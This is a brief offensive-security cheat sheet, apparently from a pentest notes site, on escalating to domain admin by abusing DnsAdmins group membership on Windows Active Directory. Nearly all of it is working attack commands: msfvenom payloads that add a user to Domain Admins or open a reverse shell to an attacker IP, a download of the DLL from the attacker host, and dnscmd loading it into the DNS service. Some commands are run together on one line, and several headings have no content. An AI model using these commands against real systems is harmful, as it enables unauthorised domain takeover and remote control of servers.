Leveraging DnsAdmins Access
Recursos
Tools
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
# Or reverse shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f dll > reverse.dllpython3 -m http.server <PORT>wget "http://<ATTACKER-IP>:<PORT>/adduser.dll" -outfile "adduser.dll"dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Get-ADGroupMember -Identity DnsAdmins
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dllCleaning Up
Using Mimilib.dll
Creating a WPAD Record
Last updated